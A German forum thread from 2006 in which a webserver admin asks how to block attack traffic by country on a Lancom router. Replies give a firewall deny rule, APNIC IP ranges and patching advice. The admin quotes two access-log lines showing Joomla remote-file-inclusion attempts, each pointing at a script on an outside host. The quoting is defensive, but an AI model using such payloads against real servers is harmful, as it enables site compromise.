bannen per Country code?

Dungeonwatcher · Beitrag von **Dungeonwatcher** » 07 Dez 2006, 13:21

Hi!

Meine kleiner Webserver wird seit einigen Tagen mächtig von Hackerangriffen gequält. Diese verlaufen bisher (auf Holz klopf) alle im Sande. Ca. 80% der Angreifer kommen mit einer Länderkennung aus tr, jp, tw. Darum würde ich diese Länder gerne bereits im LC1511 abfangen/verbieten. An welcher Schraube muss ich da per Webconfig drehen?

Bye/2

filou · Beitrag von **filou** » 07 Dez 2006, 16:16

Hi,

Indem du eine Firewallregel erstellst, alle gesammelten IPs

oder ganze Ranges einträgst, die zu den tlds gehören.
Nachteil... Es werden auch "gutartige" Zugriffe auf deinen Webserver von den verbotenen Ranges verweigert ...Was z.B. mit dyn. IPs bei Interneteinwahl?

Sinnvoll ist die Sache natürlich nicht

Wenn dein Webserver für solche Angriffe sicher und auch up to date ist, solltest du dir darüber keine Gedanken machen, denn was machen die vielen anderen Wewbserver-Admins auf der Welt, die ihre Systeme für alle offen halten müssen!?
Der Lancom verhindert (hoffentlich) zudem Dos und Intruder...

Dungeonwatcher · Beitrag von **Dungeonwatcher** » 07 Dez 2006, 17:21

filou hat geschrieben:Indem du eine Firewallregel erstellst, alle gesammelten IPs oder ganze Ranges einträgst, die zu den tlds gehören.

Hmmm, wie müsste die denn z.B. aussehen?

Nachteil... Es werden auch "gutartige" Zugriffe auf deinen Webserver von den verbotenen Ranges verweigert ...Was z.B. mit dyn. IPs bei Interneteinwahl?

Nunja, ich glaube nicht das meine Seite für Asiaten wirklich interressant ist, als das sie diese bewusst ansteuern.

Sinnvoll ist die Sache natürlich nicht

'ne andere Idee ist z.B. das bestimmte Referrer geblockt werden. Im aktuellen Fall wäre es "libwww-perl/5.48":

faq.ecobike.de - - [04/Dec/2006:11:01:21 +0000] "GET /forum/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://hellostrangermusic.com/c.in? HTTP/1.0" 404 - "" "libwww-perl/5.48"

bzw. "libwww-perl/5.805":

alpha.webserverdns.com - - [29/Sep/2006:09:46:20 +0000] "GET /forum/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://myspace.si/images/delete.gif? HTTP/1.0" 404 - "" "libwww-perl/5.805"

Wenn dein Webserver für solche Angriffe sicher und auch up to date ist, solltest du dir darüber keine Gedanken machen, denn was machen die vielen anderen Wewbserver-Admins auf der Welt, die ihre Systeme für alle offen halten müssen!?

Von meinem eigenen Webgedöhns bin ich davon überzeugt, nur von dem meines Koll. (der nutzt Joomla!) nicht so richtig. Die aktuellen Angriffe zielen z.B. alle auf ein Modul von Joomla. Das sie ins leere laufen liegt nur daran das der versuchte Pfad nicht stimmt. Ich würde also einige dieser Angriffe schon gerne vorher im LC abfangen wollen.

Der Lancom verhindert (hoffentlich) zudem Dos und Intruder...

Soooo schlimm ist es hier zum Glück noch nicht.

Bye/2

filou · Beitrag von **filou** » 07 Dez 2006, 17:52

filou hat geschrieben:Indem du eine Firewallregel erstellst, alle gesammelten IPs oder ganze Ranges einträgst, die zu den tlds gehören.
Hmmm, wie müsste die denn z.B. aussehen?

Ziel-Port 80 /TCP
Zurückweisen
Quelle-Station: IP-Bereich (der Asiaten

)
Ziel-Station: Webserver-IP

Der Lancom verhindert (hoffentlich) zudem Dos und Intruder...
Soooo schlimm ist es hier zum Glück noch nicht.

Was ist dann so schlimm? SQL-Injection? Code-Einspeisung?...

AndreasMarx · Beitrag von **AndreasMarx** » 08 Dez 2006, 00:02

filou hat geschrieben:Quelle-Station: IP-Bereich (der Asiaten )

Hallo Dungeonwatcher,

die folgenden IP's sollten schon mal nicht schaden:

Code: Alles auswählen

nano ~ # wget http://www.iana.org/assignments/ipv4-address-space
--23:49:15--  http://www.iana.org/assignments/ipv4-address-space
           => `ipv4-address-space'
Auflösen des Hostnamen »www.iana.org«.... 192.0.34.162
Verbindungsaufbau zu www.iana.org|192.0.34.162|:80... verbunden.
HTTP Anforderung gesendet, warte auf Antwort... 200 OK
Länge: 13.228 (13K) [text/plain]

100%[====================================>] 13.228        28.91K/s

23:49:16 (28.81 KB/s) - »ipv4-address-space« gespeichert [13228/13228]

nano ~ # fgrep APNIC ipv4-adress-space
058/8   Apr 04   APNIC                               (whois.apnic.net)
059/8   Apr 04   APNIC                               (whois.apnic.net)
060/8   Apr 03   APNIC                               (whois.apnic.net)
061/8   Apr 97   APNIC                               (whois.apnic.net)
121/8   Jan 06   APNIC                               (whois.apnic.net)
122/8   Jan 06   APNIC                               (whois.apnic.net)
123/8   Jan 06   APNIC                               (whois.apnic.net)
124/8   Jan 05   APNIC                               (whois.apnic.net)
125/8   Jan 05   APNIC                               (whois.apnic.net)
126/8   Jan 05   APNIC                               (whois.apnic.net)
202/8   May 93   APNIC                               (whois.apnic.net)
203/8   May 93   APNIC                               (whois.apnic.net)
210/8   Jun 96   APNIC                               (whois.apnic.net)
211/8   Jun 96   APNIC                               (whois.apnic.net)
218/8   Dec 00   APNIC                               (whois.apnic.net)
219/8   Sep 01   APNIC                               (whois.apnic.net)
220/8   Dec 01   APNIC                               (whois.apnic.net)
221/8   Jul 02   APNIC                               (whois.apnic.net)
222/8   Feb 03   APNIC                               (whois.apnic.net)
nano ~ #

Das sind die vom Asia Pacific Network Information Centre verwalteten IP-Ranges.

Falls Du berechtigte/gewünschte Zugriffe aus einem der folgende Länder hast, solltest Du das *nicht* machen.

Code: Alles auswählen

Afghanistan
American Samoa
Australia
Bangladesh
Bhutan
British Indian Ocean Territory
Brunei Darussalam
Cambodia
China
Christmas Island
Cocos (Keeling) Islands
Cook Islands
East Timor
Fiji
French Polynesia
French Southern Territories
Guam
Hong Kong
India
Indonesia
Japan
Kiribati
Korea, Dem. People's Republic
Korea, Republic of
Laos People's Dem. Republic
Macau
Malaysia
Maldives
Marshall Islands
Micronesia, Fed. States of
Mongolia
Myanmar
Nauru
Nepal
New Caledonia
New Zealand
Niue
Norfolk Island
Northern Mariana Islands
Pakistan
Palau
Papua New Guinea
Philippines
Pitcairn
Samoa
Singapore
Solomon Islands
Sri Lanka
Taiwan
Thailand
Tokelau
Tonga
Tuvalu
Vanuatu
Viet Nam
Wallis and Futuna Islands

Gruß,
Andreas

EDIT: Typo korrigiert

filou · Beitrag von **filou** » 08 Dez 2006, 05:20

Moin,

Ich registriere bei mir auch immer wieder "asiatische Aktivitäten", speziell von IPs die in Korea registriert sind, am Exchange-Server.
Der wird regelmäßig auf Mail-Relay-Fähigkeiten "abgeklopft".
Ich hasse diese Spammer...

Selbst habe ich den Test über Abuse schon gemacht und ...sollen die weiter abklopfen

D.h. ...Wichtig ist, dass die Server mit aktuellen Updates versehen, mögliche Einfallstore verriegelt und nur die wirklich notwendigen Ports geöffnet sind. In meinem Fall obligatorisch Port 25.